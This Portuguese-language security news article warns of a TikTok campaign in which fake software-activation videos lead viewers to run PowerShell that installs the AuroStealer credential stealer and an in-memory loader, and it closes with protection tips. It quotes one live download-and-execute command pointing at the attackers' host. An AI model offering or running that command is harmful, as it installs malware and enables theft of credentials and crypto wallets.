Pesquisadores de segurança identificaram uma nova campanha de malware que se aproveita da popularidade do TikTok para atingir usuários desavisados. Vídeos com aparência inofensiva estão instruindo espectadores a executarem comandos PowerShell que, na verdade, baixam e instalam códigos maliciosos em seus dispositivos.
Em um dos casos analisados, o vídeo alegava fornecer um método gratuito para ativar o Photoshop. O criador do conteúdo incentivava os usuários a abrir o PowerShell com privilégios de administrador e executar o seguinte código:
powershell iex (irm slmgr.win/photoshop)Esse comando aparentemente simples conecta-se a um servidor controlado por criminosos e executa automaticamente um script malicioso, sem qualquer confirmação por parte do usuário.
O golpe: de um clique ao roubo de credenciais
A ação inicial baixa um script PowerShell disfarçado, projetado para manter a persistência no sistema. Ele cria uma tarefa agendada com nomes legítimos como “AdobeUpdateTask” ou “WindowsUpdateCheck” uma tentativa de passar despercebido pelas verificações manuais e automáticas.
Esse script então baixa o executável Updater.exe, identificado como o AuroStealer, um trojan conhecido por coletar credenciais armazenadas em navegadores, além de carteiras de criptomoedas. O malware permanece ativo no sistema e se comunica com servidores externos para exfiltrar os dados coletados.
Em seguida, outra carga maliciosa é baixada: o arquivo source.exe. Ele representa uma etapa mais avançada, executando um código que se compila durante a própria execução técnica que dificulta a detecção por antivírus tradicionais. Através do uso do compilador .NET csc.exe, ele gera um código temporário que injeta shellcode diretamente na memória, sem gravar arquivos no disco.
Técnica ClickFix adaptada para redes sociais
Essa abordagem lembra ataques anteriores conhecidos como ClickFix, nos quais os usuários são levados a realizar ações aparentemente legítimas, como clicar em links ou comandos fornecidos por figuras de autoridade neste caso, os próprios criadores dos vídeos.
No TikTok, o apelo visual e a linguagem informal aumentam a eficácia do golpe. Outros vídeos da mesma campanha simulam “ativadores” para o Microsoft Office e até desbloqueadores do Windows, todos seguindo a mesma lógica de exploração.
O que torna essa ameaça preocupante
O uso de plataformas de entretenimento para distribuir malware representa uma mudança estratégica importante no cenário de ameaças cibernéticas. Ao misturar conteúdo popular com instruções técnicas, os invasores conseguem alcançar um público amplo, incluindo pessoas com pouco conhecimento técnico.
Além disso, a combinação de execução em memória, uso de tarefas disfarçadas e compilação sob demanda aumenta a sofisticação da ameaça e reduz significativamente as chances de detecção precoce.
Como se proteger
- Nunca execute comandos sugeridos por vídeos ou postagens em redes sociais, especialmente se envolvem PowerShell, terminal ou solicitações administrativas.
- Mantenha soluções de segurança atualizadas com proteção contra execução em memória.
- Monitore atividades incomuns, como a criação de tarefas agendadas suspeitas ou comunicações com domínios não reconhecidos.
- Compartilhe esse tipo de alerta com sua equipe ou comunidade para aumentar a conscientização.
Essa campanha revela como os criminosos estão cada vez mais criativos e dispostos a explorar qualquer canal inclusive o TikTok para disseminar ameaças com alto potencial de dano.
